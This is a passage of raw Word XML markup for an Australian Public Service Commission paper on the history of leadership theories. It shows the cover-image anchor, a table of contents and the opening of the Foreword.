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8EA" w:rsidRDefault="001E0468">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A624D9F" wp14:editId="5848C22C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-902252</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-894300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7607808" cy="10744200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1" name="Picture 1" descr="Document cover page with Australian Public Service Commission brand" title="Thinking about leadership: a brief history of leadership tho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41 Thinking about leadership A4 cov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808" cy="10744200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="001868EA">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4C39" w:rsidRDefault="006137AB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:id w:val="-1293130412"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="000C1C31" w:rsidRDefault="000C1C31" w:rsidP="007D4C39">
          <w:pPr>
            <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
          </w:pPr>
        </w:p>
        <w:p w:rsidR="00B53C30" w:rsidRDefault="00B53C30">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00614DCA" w:rsidRDefault="00BC79BB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B53C30">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc374536610" w:history="1">
            <w:r w:rsidR="00614DCA" w:rsidRPr="0018763D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Foreword</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc374536610 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00614DCA" w:rsidRDefault="00067E21">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc374536611" w:history="1">
            <w:r w:rsidR="00614DCA" w:rsidRPr="0018763D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc374536611 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00614DCA" w:rsidRDefault="00067E21">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc374536612" w:history="1">
            <w:r w:rsidR="00614DCA" w:rsidRPr="0018763D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Theories of leadership – 1840 to 1980</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc374536612 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00614DCA" w:rsidRDefault="00067E21">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc374536613" w:history="1">
            <w:r w:rsidR="00614DCA" w:rsidRPr="0018763D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Trait-based leadership</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc374536613 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00614DCA" w:rsidRDefault="00067E21">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc374536614" w:history="1">
            <w:r w:rsidR="00614DCA" w:rsidRPr="0018763D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Situational leadership</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc374536614 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00614DCA" w:rsidRDefault="00067E21">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc374536615" w:history="1">
            <w:r w:rsidR="00614DCA" w:rsidRPr="0018763D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Contingency theory</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc374536615 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00614DCA" w:rsidRDefault="00067E21">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc374536616" w:history="1">
            <w:r w:rsidR="00614DCA" w:rsidRPr="0018763D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Transactional leadership and transformational leadership</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc374536616 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00614DCA" w:rsidRDefault="00067E21">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc374536617" w:history="1">
            <w:r w:rsidR="00614DCA" w:rsidRPr="0018763D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Contemporary thinking on leadership</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc374536617 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00614DCA" w:rsidRDefault="00067E21">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc374536618" w:history="1">
            <w:r w:rsidR="00614DCA" w:rsidRPr="0018763D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Authentic leadership</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc374536618 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00614DCA" w:rsidRDefault="00067E21">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc374536619" w:history="1">
            <w:r w:rsidR="00614DCA" w:rsidRPr="0018763D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Adaptive leadership</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc374536619 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00614DCA" w:rsidRDefault="00067E21">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc374536620" w:history="1">
            <w:r w:rsidR="00614DCA" w:rsidRPr="0018763D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Neuroleadership</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc374536620 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00614DCA" w:rsidRDefault="00067E21">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc374536621" w:history="1">
            <w:r w:rsidR="00614DCA" w:rsidRPr="0018763D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Complexity leadership</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc374536621 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00614DCA" w:rsidRDefault="00067E21">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc374536622" w:history="1">
            <w:r w:rsidR="00614DCA" w:rsidRPr="0018763D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Reference list</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc374536622 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="00614DCA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B53C30" w:rsidRDefault="00BC79BB">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="006137AB" w:rsidRDefault="006137AB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F0534" w:rsidRDefault="00EB29E3" w:rsidP="00E86D6A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc374536610"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Foreword</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="000F0534" w:rsidRDefault="000F0534" w:rsidP="000F0534">
      <w:r>
        <w:t>The Strategic Centre for Leadership, Learning and Development</w:t>
      </w:r>
      <w:r w:rsidR="00D221DB">
        <w:t xml:space="preserve"> (the Strategic Centre)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at the Australian Public Service Commission </w:t>
      </w:r>
      <w:r w:rsidR="005A0D09">
        <w:t xml:space="preserve">aims to </w:t>
      </w:r>
      <w:r w:rsidR="00D221DB">
        <w:t>improv</w:t>
      </w:r>
      <w:r w:rsidR="005A0D09">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00D221DB">
        <w:t xml:space="preserve"> talent management and expand and strengthen learning and development across the Australian Public Service (APS).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00143B4C" w:rsidRDefault="00D221DB" w:rsidP="00A65A1B">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
